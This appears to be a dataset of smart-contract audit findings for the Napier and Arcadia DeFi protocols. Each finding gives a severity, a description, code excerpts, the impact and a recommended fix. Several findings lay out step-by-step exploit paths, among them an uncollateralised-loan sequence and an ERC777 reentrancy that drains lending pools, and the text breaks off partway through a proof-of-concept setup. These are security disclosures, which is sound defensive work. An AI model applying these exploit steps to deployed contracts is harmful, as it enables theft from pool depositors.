Users who intend to swap underlying assets to YT tokens via the Router will be unable to do so.\\nThe `swapUnderlyingForYt` allows users to swap underlying assets to a specific number of YT tokens they desire.\\n```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. (10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n\\nLine 353-354 above compute the number of underlying deposits needed to send to the Tranche to issue the amount of YT token the users desired. 
It attempts to add a buffer of 0.01 bps buffer to prevent rounding errors that could lead to insufficient PT being repaid to the pool and result in a revert. During the audit, it was found that this buffer is ineffective in achieving its purpose.\\nThe following example/POC demonstrates a revert could still occur due to insufficient PT being repaid despite having a buffer:\\nLet the state be the following:\\ncscale = 1.2e18\\nmaxScale = 1.25e18\\nytOutDesired = 123\\nissuanceFee = 0% (For simplicity's sake, the fee is set to zero. Having fee or not does not affect the validity of this issue as this is a math problem)\\nThe following computes the number of underlying assets to be transferred to the Tranche to mint/issue PY + YT\\n```\\nuDepositNoFee = cscale * ytOutDesired / maxscale;\\nuDepositNoFee = 1.2e18 * 123 / 1.25e18 = 118.08 = 118 (Round down)\\n\\nuDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1))\\nuDeposit = 118 * 10000 / (10000 - (0 + 1)) = 118.0118012 = 118 (Round down)\\n```\\n\\nSubsequently, the code will perform a flash-swap via the `swapPtForUnderlying` function. It will borrow 123 PT from the pool, which must be repaid later.\\nIn the swap callback function, the code will transfer 118 underlying assets to the Tranche and execute the `Tranche.issue` function to mint/issue PY + YT.\\nWithin the `Tranche.issue` function, it will trigger the `adapter.prefundedDeposit()` function to mint the estETH/shares. 
The following is the number of estETH/shares minted:\\n```\\nshares = assets * (total supply/total assets)\\nsahres = 118 * 100e18 / 120e18 = 98.33333333 = 98 shares\\n```\\n\\nNext, Line 219 below of the `Tranche.issue` function will compute the number of PY+YT to be issued/minted\\n```\\nissued = (sharesUsed - fee).mulWadDown(_maxscale);\\nissued = (sharesUsed - 0).mulWadDown(_maxscale);\\nissued = sharesUsed.mulWadDown(_maxscale);\\n\\nissued = sharesUsed * _maxscale / WAD\\nissued = 98 * 1.25e18 / 1e18 = 122.5 = 122 PT (Round down)\\n```\\n\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n```\\n\\nAt the end of the `Tranche.issue` function, 122 PY + YT is issued/minted back to the Router.\\nNote that 123 PT was flash-loaned earlier, and 123 PT needs to be repaid. Otherwise, the code at Line 164 below will revert. The main problem is that only 122 PY was issued/minted (a shortfall of 1 PY). Thus, the swap TX will revert at the end.\\n```\\nFile: NapierRouter.sol\\n function swapCallback(int256 underlyingDelta, int256 ptDelta, bytes calldata data) external override {\\n..SNIP..\\n uint256 pyIssued = params.pt.issue({to: address(this), underlyingAmount: params.underlyingDeposit});\\n\\n // Repay the PT to Napier pool\\n if (pyIssued < pyDesired) revert Errors.RouterInsufficientPtRepay();\\n```\\nчThe buffer does not appear to be the correct approach to manage this rounding error. One could increase the buffer from 0.01% to 1% and solve the issue in the above example, but a different or larger number might cause a rounding error to surface again. 
Also, a larger buffer means that many unnecessary PTs will be issued.\\nThus, it is recommended that a round-up division be performed when computing the `uDepositNoFee` and `uDeposit` using functions such as `divWadUp` so that the issued/minted PT can cover the debt.чThe core function (swapUnderlyingForYt) of the Router will break. Users who intend to swap underlying assets to YT tokens via the Router will not be able to do so.ч```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. 
(10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n -FRAX admin can adjust fee rate to harm Napier and its usersчmediumчFRAX admin can adjust fee rates to harm Napier and its users, preventing Napier users from withdrawing.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered \"RESTRICTED\". This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? 
RESTRICTED\\nFollowing is one of the ways that FRAX admin can harm Napier and its users.\\nFRAX admin can set the fee to 100%.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n\\nWhen the adaptor attempts to redeem the staked ETH from FRAX via the `enterRedemptionQueue` function, the 100% fee will consume the entire amount of the staked fee, leaving nothing for Napier's adaptor.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function enterRedemptionQueue(address _recipient, uint120 _amountToRedeem) public nonReentrant {\\n // Get queue information\\n RedemptionQueueState memory _redemptionQueueState = redemptionQueueState;\\n RedemptionQueueAccounting memory _redemptionQueueAccounting = redemptionQueueAccounting;\\n\\n // Calculations: redemption fee\\n uint120 _redemptionFeeAmount = ((uint256(_amountToRedeem) * _redemptionQueueState.redemptionFee) /\\n FEE_PRECISION).toUint120();\\n\\n // Calculations: amount of ETH owed to the user\\n uint120 _amountEtherOwedToUser = _amountToRedeem - _redemptionFeeAmount;\\n\\n // Calculations: increment ether liabilities by the amount of ether owed to the user\\n _redemptionQueueAccounting.etherLiabilities += uint128(_amountEtherOwedToUser);\\n\\n // Calculations: increment unclaimed fees by the redemption fee taken\\n _redemptionQueueAccounting.unclaimedFees += _redemptionFeeAmount;\\n\\n // Calculations: maturity timestamp\\n uint64 _maturityTimestamp = uint64(block.timestamp) + _redemptionQueueState.queueLengthSecs;\\n\\n // Effects: Initialize the 
redemption ticket NFT information\\n nftInformation[_redemptionQueueState.nextNftId] = RedemptionQueueItem({\\n amount: _amountEtherOwedToUser,\\n maturity: _maturityTimestamp,\\n hasBeenRedeemed: false,\\n earlyExitFee: _redemptionQueueState.earlyExitFee\\n });\\n```\\nчEnsure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.чUsers unable to withdraw their assets. Loss of assets for the victim.ч```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n -SFrxETHAdapter redemptionQueue waiting period can DOS adapter functionsчmediumчThe waiting period between `rebalancer` address making a withdrawal request and the withdrawn funds being ready to claim from `FraxEtherRedemptionQueue` is extremely long which can lead to a significant period of time where some of the protocol's functions are either unusable or work in a diminished capacity.\\nIn FraxEtherRedemptionQueue.sol; the Queue wait time is stored in the state struct `redemptionQueueState` as `redemptionQueueState.queueLengthSecs` and is curently set to `1_296_000 Seconds` or 15 Days; as recently as January however it was at `1_555_200 Seconds` or `18 Days`. View current setting by calling `redemptionQueueState()` here.\\n`BaseLSTAdapter::requestWithdrawal()` is an essential function which helps to maintain `bufferEth` at a defined, healthy level. 
`bufferEth` is a facility which enables the smooth running of redemptions and deposits.\\nFor redemptions; it allows users to redeem `underlying` without having to wait for any period of time. However, redemption amounts requested which exceed `bufferEth` will be rejected as can be seen below in `BaseLSTAdapter::prefundedRedeem()`. Further, there is nothing preventing `redemptions` from bringing `bufferEth` all the way to `0`.\\n```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n\\nFor deposits; where `bufferEth` is too low, it keeps user `deposits` in the contract until a deposit is made which brings `bufferEth` above its target, at which point it stakes. During this time, the `deposits`, which are kept in the adapter, do not earn any yield; making those funds unprofitable.\\n```\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n // SOME CODE\\n> if (targetBufferEth >= availableEth + queueEthCache) {\\n> bufferEth = availableEth.toUint128();\\n return (assets, shares);\\n }\\n // SOME CODE\\n }\\n```\\nчConsider adding a function allowing the rebalancer to call `earlyBurnRedemptionTicketNft()` in `FraxEtherRedemptionQueue.sol` when there is a necessity. This will allow an immediate withdrawal for a fee of 0.5%; see function hereчIf the `SFrxETHAdapter` experiences a large net redemption, bringing `bufferEth` significantly below `targetBufferEth`, the rebalancer can be required to make a withdrawal request in order to replenish the buffer. However, this will be an ineffective action given the current, 15 Day waiting period. 
During the waiting period if `redemptions > deposits`, the `bufferEth` can be brought down to `0` which will mean a complete DOSing of the `prefundedRedeem()` function.\\nDuring the wait period too; if `redemptions >= deposits`, no new funds will be staked in `FRAX` so yields for users will decrease and may in turn lead to more redemptions.\\nThese conditions could also necessitate the immediate calling again of `requestWithdrawal()`, given that withdrawal requests can only bring `bufferEth` up to its target level and not beyond and during the wait period there could be further redemptions.ч```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n -`AccountV1#flashActionByCreditor` can be used to drain assets from account without withdrawingчhighч`AccountV1#flashActionByCreditor` is designed to allow atomic flash actions moving funds from the `owner` of the account. By making the account own itself, these arbitrary calls can be used to transfer `ERC721` assets directly out of the account. 
The assets being transferred from the account will still show as deposited on the account allowing it to take out loans from creditors without having any actual assets.\\nThe overview of the exploit is as follows:\\n```\\n1) Deposit ERC721\\n2) Set creditor to malicious designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks it has ERC721\\n5) Use malicious designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n7) Update creditor to legitimate creditor\\n8) Take out loan against nothing\\n9) Profit\\n```\\n\\nThe key to this exploit is that the account is able to be its own `owner`. Paired with a maliciously designed `creditor` (creditor can be set to anything) `flashActionByCreditor` can be called by the attacker when this is the case.\\nAccountV1.sol#L770-L772\\n```\\nif (transferFromOwnerData.assets.length > 0) {\\n _transferFromOwner(transferFromOwnerData, actionTarget);\\n}\\n```\\n\\nIn these lines the `ERC721` token is transferred out of the account. The issue is that even though the token is transferred out, the `erc721Stored` array is not updated to reflect this change.\\nAccountV1.sol#L570-L572\\n```\\nfunction auctionBoughtIn(address recipient) external onlyLiquidator nonReentrant {\\n _transferOwnership(recipient);\\n}\\n```\\n\\nAs seen above `auctionBoughtIn` does not have any requirement besides being called by the `liquidator`. Since the `liquidator` is also malicious, it can then abuse this function to set the `owner` to any address, which allows the attacker to recover ownership of the account. 
Now the attacker has an account that still considers the `ERC721` token as owned but that token isn't actually present in the account.\\nNow the account creditor can be set to a legitimate pool and a loan taken out against no collateral at all.чThe root cause of this issue is that the account can own itself. The fix is simple, make the account unable to own itself by causing transferOwnership to revert if `owner == address(this)`чAccount can take out completely uncollateralized loans, causing massive losses to all lending pools.ч```\\n1) Deposit ERC721\\n2) Set creditor to malicious designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks is has ERC721\\n5) Use malicious designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n7) Update creditor to legitimate creditor\\n8) Take out loan against nothing\\n9) Profit\\n```\\n -Reentrancy in flashAction() allows draining liquidity poolsчhighчIt is possible to drain a liquidity pool/creditor if the pool's asset is an ERC777 token by triggering a reentrancy flow using flash actions.\\nThe following vulnerability describes a complex flow that allows draining any liquidity pool where the underlying asset is an ERC777 token. Before diving into the vulnerability, it is important to properly understand and highlight some concepts from Arcadia that are relevant in order to allow this vulnerability to take place:\\nFlash actions: flash actions in Arcadia operate in a similar fashion to flash loans. Any account owner will be able to borrow an arbitrary amount from the creditor without putting any collateral as long as the account remains in a healthy state at the end of execution. 
The following steps summarize what actually happens when `LendingPool.flashAction()` flow is triggered:\\nThe amount borrowed (plus fees) will be minted to the account as debt tokens. This means that the amount borrowed in the flash action will be accounted as debt during the whole `flashAction()` execution. If a flash action borrowing 30 tokens is triggered for an account that already has 10 tokens in debt, the debt balance of the account will increase to 40 tokens + fees.\\nBorrowed asset will be transferred to the `actionTarget`. The `actionTarget` is an arbitrary address passed as parameter in the `flashAction()`. It is important to be aware of the fact that transferring the borrowed funds is performed prior to calling `flashActionByCreditor()`, which is the function that will end up verifying the account's health state. This is the step where the reentrancy will be triggered by the `actionTarget`.\\nThe account's `flashActionByCreditor()` function is called. This is the last step in the execution function, where a health check for the account is performed (among other things).\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address `actionTarget`, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n ... 
\\n\\n uint256 amountBorrowedWithFee = amountBorrowed + amountBorrowed.mulDivUp(originationFee, ONE_4);\\n\\n ...\\n \\n // Mint debt tokens to the Account, debt must be minted before the actions in the Account are performed.\\n _deposit(amountBorrowedWithFee, account);\\n\\n ...\\n\\n // Send Borrowed funds to the `actionTarget`.\\n asset.safeTransfer(actionTarget, amountBorrowed);\\n \\n // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint...).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n ... \\n }\\nCollateral value: Each creditor is configured with some risk parameters in the `Registry` contract. One of the risk parameters is the `minUsdValue`, which is the minimum USD value any asset must have when it is deposited into an account for the creditor to consider such collateral as valid. If the asset does not reach the `minUsdValue`, it will simply be accounted with a value of 0. For example: if the `minUsdValue` configured for a given creditor is 100 USD and we deposit an asset in our account worth 99 USD (let's say 99 USDT), the USDT collateral will be accounted as 0. This means that our USDT will be worth nothing at the eyes of the creditor. 
However, if we deposit one more USDT token into the account, our USD collateral value will increase to 100 USD, reaching the `minUsdValue`. Now, the creditor will consider our account's collateral to be worth 100 USD instead of 0 USD.\\nLiquidations: Arcadia liquidates unhealthy accounts using a dutch-auction model. When a liquidation is triggered via `Liquidator.liquidateAccount()` all the information regarding the debt and assets from the account will be stored in `auctionInformation_` , which maps account addresses to an `AuctionInformation` struct. An important field in this struct is the `assetShares`, which will store the relative value of each asset, with respect to the total value of the Account.\\nWhen a user wants to bid for an account in liquidation, the `Liquidator.bid()` function must be called. An important feature from this function is that it does not require the bidder to repay the loan in full (thus getting the full collateral in the account). Instead, the bidder can specify which collateral asset and amount wants to obtain back, and the contract will compute the amount of debt required to be repaid from the bidder for that amount of collateral. If the user wants to repay the full loan, all the collateral in the account will be specified by the bidder.\\nWith this background, we can now move on to describing the vulnerability in full.\\nInitially, we will create an account and deposit collateral whose value is in the limit of the configured `minUsdValue` (if the `minUsdValue` is 100 tokens, the ideal amount to have will be 100 tokens to maximize gains). We will see why this is required later. The account's collateral and debt status will look like this:\\n\\nThe next step after creating the account is to trigger a flash action. As mentioned in the introduction, the borrowed funds will be sent to the `actionTarget` (this will be a contract we create and control). 
An important requirement is that if the borrowed asset is an ERC777 token, we will be able to execute the ERC777 callback in our `actionTarget` contract, enabling us to gain control of the execution flow. Following our example, if we borrowed 200 tokens the account's status would look like this:\\n\\nOn receiving the borrowed tokens, the actual attack will begin. The actionTarget will trigger the `Liquidator.liquidateAccount()` function to liquidate our own account. This is possible because the funds borrowed using the flash action are accounted as debt for our account (as we can see in the previous image, the borrowed amount greatly surpasses our account's collateral value) prior to executing the `actionTarget` ERC777 callback, making the account susceptible to being liquidated. Executing this function will start the auction process and store data relevant to the account and its debt in the `auctionInformation_` mapping.\\nAfter finishing the `liquidateAccount()` execution, the next step for the `actionTarget` is to place a bid for our own account auction calling `Liquidator.bid()`. The trick here is to request a small amount from the account's collateral in the `askedAssetAmounts` array (if we had 100 tokens as collateral in the account, we could ask for only 1). The small requested amount will make the computed `price` to pay for the bid by `_calculateBidPrice()` be really small so that we can maximize our gains. 
Another requirement will be to set the `endAuction_` parameter to `true` (we will see why later):\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of \"price\" in \"Numeraire\" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a \"transferFrom\" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n\\nAfter computing the small price to pay for the bid, theLendingPool.auctionRepay() will be called. Because we are repaying a really small amount from the debt, the `accountDebt <= amount` condition will NOT hold, so the only actions performed by `LendingPool.auctionRepay()` will be transferring the small amount of tokens to pay the bid, and `_withdraw()` (burn) the corresponding debt from the account (a small amount of debt will be burnt here because the bid amount is small). 
It is also important to note that the `earlyTerminate` flag will remain as false:\\n```\\n// LendingPool.sol\\n\\nfunction auctionRepay(uint256 startDebt, uint256 minimumMargin_, uint256 amount, address account, address bidder)\\n external\\n whenLiquidationNotPaused\\n onlyLiquidator \\n processInterests\\n returns (bool earlyTerminate)\\n {\\n // Need to transfer before burning debt or ERC777s could reenter.\\n // Address(this) is trusted -> no risk on re-entrancy attack after transfer.\\n asset.safeTransferFrom(bidder, address(this), amount);\\n\\n uint256 accountDebt = maxWithdraw(account); \\n if (accountDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();\\n if (accountDebt <= amount) {\\n // The amount recovered by selling assets during the auction is bigger than the total debt of the Account.\\n // -> Terminate the auction and make the surplus available to the Account-Owner.\\n earlyTerminate = true;\\n unchecked {\\n _settleLiquidationHappyFlow(account, startDebt, minimumMargin_, bidder, (amount - accountDebt));\\n }\\n amount = accountDebt;\\n }\\n \\n _withdraw(amount, address(this), account); \\n\\n emit Repay(account, bidder, amount);\\n }\\n```\\n\\nAfter `LendingPool.auctionRepay()` , execution will go back to `Liquidator.bid()`. The account's `auctionBid()` function will then be called, which will transfer the 1 token requested by the bidder in the `askedAssetAmounts` parameter from the account's collateral to the bidder. This is the most important concept in the attack. 
Because 1 token is moving out from the account's collateral, the current collateral value from the account will be decreased from 100 USD to 99 USD, making the collateral value be under the minimum `minUsdValue` amount of 100 USD, and thus making the collateral value from the account go straight to 0 at the eyes of the creditor:\\n\\nBecause the `earlyTerminate` was NOT set to `true` in `LendingPool.auctionRepay()`, the `if (earlyTerminate)` condition will be skipped, going straight to evaluate the `else if (endAuction_)` condition . Because we set theendAuction_ parameter to `true` when calling the `bid()` function, `_settleAuction()` will execute.\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n // rest of code\\n \\n // Transfer the assets to the bidder.\\n IAccount(account).auctionBid(\\n auctionInformation_.assetAddresses, auctionInformation_.assetIds, askedAssetAmounts, msg.sender\\n );\\n // If all the debt is repaid, the auction must be ended, even if the bidder did not set endAuction to true.\\n if (earlyTerminate) {\\n // Stop the auction, no need to do a health check for the account since it has no debt anymore.\\n _endAuction(account);\\n }\\n // If not all debt is repaid, the bidder can still earn a termination incentive by ending the auction\\n // if one of the conditions to end the auction is met.\\n // \"_endAuction()\" will silently fail without reverting, if the auction was not successfully ended.\\n else if (endAuction_) {\\n if (_settleAuction(account, auctionInformation_)) _endAuction(account);\\n } \\n }\\n```\\n\\n`_settleAuction()` is where the final steps of the attack will take place. 
Because we made the collateral value of our account purposely decrease from the `minUsdValue`, `_settleAuction` will interpret that all collateral has been sold, and the `else if (collateralValue == 0)` will evaluate to true, making the creditor's `settleLiquidationUnhappyFlow()` function be called:\\n```\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // Cache variables.\\n uint256 startDebt = auctionInformation_.startDebt;\\n address creditor = auctionInformation_.creditor;\\n uint96 minimumMargin = auctionInformation_.minimumMargin;\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue();\\n uint256 usedMargin = IAccount(account).getUsedMargin();\\n \\n // Check the different conditions to end the auction.\\n if (collateralValue >= usedMargin || usedMargin == minimumMargin) { \\n // Happy flow: Account is back in a healthy state.\\n // An Account is healthy if the collateral value is equal or greater than the used margin.\\n // If usedMargin is equal to minimumMargin, the open liabilities are 0 and the Account is always healthy.\\n ILendingPool(creditor).settleLiquidationHappyFlow(account, startDebt, minimumMargin, msg.sender);\\n } else if (collateralValue == 0) {\\n // Unhappy flow: All collateral is sold.\\n ILendingPool(creditor).settleLiquidationUnhappyFlow(account, startDebt, minimumMargin, msg.sender);\\n }\\n // rest of code\\n \\n \\n return true;\\n }\\n```\\n\\nExecuting the `settleLiquidationUnhappyFlow()` will burn ALL the remaining debt (balanceOf[account] will return all the remaining balance of debt tokens for the account), and the liquidation will be finished, calling `_endLiquidation()` and leaving the account with 99 tokens of collateral and a 0 amount of debt (and the `actionTarget` with ALL the borrowed funds taken from the flash action).\\n```\\n// LendingPool.sol\\n\\nfunction settleLiquidationUnhappyFlow(\\n address account,\\n uint256 
startDebt,\\n uint256 minimumMargin_,\\n address terminator\\n ) external whenLiquidationNotPaused onlyLiquidator processInterests {\\n // rest of code\\n\\n // Any remaining debt that was not recovered during the auction must be written off.\\n // Depending on the size of the remaining debt, different stakeholders will be impacted.\\n uint256 debtShares = balanceOf[account];\\n uint256 openDebt = convertToAssets(debtShares);\\n uint256 badDebt;\\n // rest of code\\n\\n // Remove the remaining debt from the Account now that it is written off from the liquidation incentives/Liquidity Providers.\\n _burn(account, debtShares);\\n realisedDebt -= openDebt;\\n emit Withdraw(msg.sender, account, account, openDebt, debtShares);\\n\\n _endLiquidation();\\n\\n emit AuctionFinished(\\n account, address(this), startDebt, initiationReward, terminationReward, liquidationPenalty, badDebt, 0\\n );\\n }\\n```\\n\\nAfter the actionTarget's ERC777 callback execution, the execution flow will return to the initially called `flashAction()` function, and the final `IAccount(account).flashActionByCreditor()` function will be called, which will pass all the health checks due to the fact that all the debt from the account was burnt:\\n```\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address actionTarget, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n \\n // rest of code \\n \\n // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint// rest of code).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger 
than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n // rest of code \\n }\\n```\\n\\n```\\n// AccountV1.sol\\n\\nfunction flashActionByCreditor(address actionTarget, bytes calldata actionData)\\n external\\n nonReentrant\\n notDuringAuction\\n updateActionTimestamp\\n returns (uint256 accountVersion)\\n {\\n \\n // rest of code\\n\\n // Account must be healthy after actions are executed.\\n if (isAccountUnhealthy()) revert AccountErrors.AccountUnhealthy();\\n\\n // rest of code\\n }\\n```\\n\\nProof of Concept\\nThe following proof of concept illustrates how the previously described attack can take place. Follow the steps in order to reproduce it:\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import \"../utils/mocks/tokens/ERC777Mock.sol\"; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock 
